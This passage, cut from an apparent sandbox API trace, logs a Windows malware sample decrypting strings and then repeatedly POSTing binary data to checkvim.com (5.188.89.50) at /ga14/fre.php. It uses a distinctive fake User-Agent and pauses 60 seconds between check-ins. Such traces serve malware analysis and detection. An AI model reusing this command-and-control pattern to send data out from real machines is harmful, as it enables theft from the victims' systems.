(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.606] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.606] GetProcessHeap () returned 0x840000 [0237.606] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0237.607] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0237.607] GetProcessHeap () returned 0x840000 [0237.607] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0237.607] GetProcessHeap () returned 0x840000 [0237.607] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0237.607] GetProcessHeap () returned 0x840000 [0237.607] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0237.607] GetProcessHeap () returned 0x840000 [0237.607] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0237.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.609] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0237.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.627] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0237.634] GetProcessHeap () returned 0x840000 [0237.634] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0237.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.635] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0237.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.637] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0237.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.637] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.638] GetProcessHeap () returned 0x840000 [0237.638] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0237.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.639] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0237.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.640] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0237.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0237.641] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0237.641] GetProcessHeap () returned 0x840000 [0237.641] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0237.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.642] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0237.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.642] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0237.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.643] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0237.643] GetProcessHeap () returned 0x840000 [0237.643] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0237.643] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0237.645] GetProcessHeap () returned 0x840000 [0237.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0237.645] socket (af=2, type=1, protocol=6) returned 0x338 [0237.645] connect (s=0x338, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0237.712] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0237.712] GetProcessHeap () returned 0x840000 [0237.713] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0237.713] GetProcessHeap () returned 0x840000 [0237.713] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0237.713] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0237.714] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0237.714] GetProcessHeap () returned 0x840000 [0237.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0237.714] GetProcessHeap () returned 0x840000 [0237.714] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0237.714] GetProcessHeap () returned 0x840000 [0237.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0237.714] GetProcessHeap () returned 0x840000 [0237.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0237.715] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0237.716] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0237.716] GetProcessHeap () returned 0x840000 [0237.716] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0237.716] GetProcessHeap () returned 0x840000 [0237.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0237.716] send (s=0x338, buf=0x873a58*, len=237, flags=0) returned 237 [0237.717] send (s=0x338, buf=0x87eb58*, len=159, flags=0) returned 159 [0237.717] GetProcessHeap () returned 0x840000 [0237.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0237.717] recv (in: s=0x338, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0238.079] GetProcessHeap () returned 0x840000 [0238.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0238.079] GetProcessHeap () returned 0x840000 [0238.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0238.079] GetProcessHeap () returned 0x840000 [0238.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0238.079] GetProcessHeap () returned 0x840000 [0238.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0238.080] closesocket (s=0x338) returned 0 [0238.080] GetProcessHeap () returned 0x840000 [0238.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0238.080] GetProcessHeap () returned 0x840000 [0238.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0238.080] GetProcessHeap () returned 0x840000 [0238.081] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0238.081] GetProcessHeap () returned 0x840000 [0238.081] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0238.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1324) returned 0x338 [0238.122] Sleep (dwMilliseconds=0xea60) [0238.129] GetProcessHeap () returned 0x840000 [0238.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcb0 [0238.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.130] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0238.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.152] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0238.160] GetProcessHeap () returned 0x840000 [0238.160] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0238.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.162] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0238.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.163] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0238.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.164] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.164] GetProcessHeap () returned 0x840000 [0238.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0238.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.167] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcb0, pdwDataLen=0x19f9a4 | out: pbData=0x87fcb0, pdwDataLen=0x19f9a4) returned 1 [0238.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.168] CryptDestroyKey (hKey=0x87e570) returned 1 [0238.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.170] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0238.170] GetProcessHeap () returned 0x840000 [0238.170] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0238.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.172] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.173] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.174] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.176] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.176] GetProcessHeap () returned 0x840000 [0238.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0238.176] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0238.176] GetProcessHeap () returned 0x840000 [0238.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0238.176] GetProcessHeap () returned 0x840000 [0238.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0238.176] GetProcessHeap () returned 0x840000 [0238.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0238.176] GetProcessHeap () returned 0x840000 [0238.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0238.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.178] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0238.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.186] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0238.193] GetProcessHeap () returned 0x840000 [0238.193] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0238.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.196] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0238.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.198] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0238.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.199] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.199] GetProcessHeap () returned 0x840000 [0238.199] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0238.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.201] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0238.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.202] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0238.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0238.203] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0238.203] GetProcessHeap () returned 0x840000 [0238.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0238.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.204] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0238.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.206] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0238.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.207] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0238.207] GetProcessHeap () returned 0x840000 [0238.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0238.207] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0238.211] GetProcessHeap () returned 0x840000 [0238.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0238.212] socket (af=2, type=1, protocol=6) returned 0x33c [0238.212] connect (s=0x33c, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0240.442] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0240.442] GetProcessHeap () returned 0x840000 [0240.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0240.442] GetProcessHeap () returned 0x840000 [0240.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0240.443] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0240.444] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0240.444] GetProcessHeap () returned 0x840000 [0240.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0240.444] GetProcessHeap () returned 0x840000 [0240.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0240.444] GetProcessHeap () returned 0x840000 [0240.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0240.444] GetProcessHeap () returned 0x840000 [0240.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0240.445] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0240.446] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0240.446] GetProcessHeap () returned 0x840000 [0240.446] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0240.446] GetProcessHeap () returned 0x840000 [0240.446] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0240.446] send (s=0x33c, buf=0x873a58*, len=237, flags=0) returned 237 [0240.447] send (s=0x33c, buf=0x87eb58*, len=159, flags=0) returned 159 [0240.447] GetProcessHeap () returned 0x840000 [0240.447] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0240.447] recv (in: s=0x33c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0240.865] GetProcessHeap () returned 0x840000 [0240.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0240.865] GetProcessHeap () returned 0x840000 [0240.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0240.866] GetProcessHeap () returned 0x840000 [0240.866] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0240.866] GetProcessHeap () returned 0x840000 [0240.866] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0240.866] closesocket (s=0x33c) returned 0 [0240.866] GetProcessHeap () returned 0x840000 [0240.866] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0240.866] GetProcessHeap () returned 0x840000 [0240.866] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0240.866] GetProcessHeap () returned 0x840000 [0240.867] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0240.867] GetProcessHeap () returned 0x840000 [0240.867] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0240.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x131c) returned 0x33c [0240.873] Sleep (dwMilliseconds=0xea60) [0240.875] GetProcessHeap () returned 0x840000 [0240.875] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0240.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0240.876] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0240.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0240.885] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0241.210] GetProcessHeap () returned 0x840000 [0241.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0241.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.212] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0241.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.214] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0241.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.215] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.215] GetProcessHeap () returned 0x840000 [0241.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0241.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.216] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0241.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.218] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0241.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.219] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0241.219] GetProcessHeap () returned 0x840000 [0241.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0241.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.225] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.229] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.229] GetProcessHeap () returned 0x840000 [0241.229] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0241.229] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0241.229] GetProcessHeap () returned 0x840000 [0241.229] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0241.229] GetProcessHeap () returned 0x840000 [0241.230] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0241.230] GetProcessHeap () returned 0x840000 [0241.230] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0241.230] GetProcessHeap () returned 0x840000 [0241.230] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0241.230] LoadLibraryW 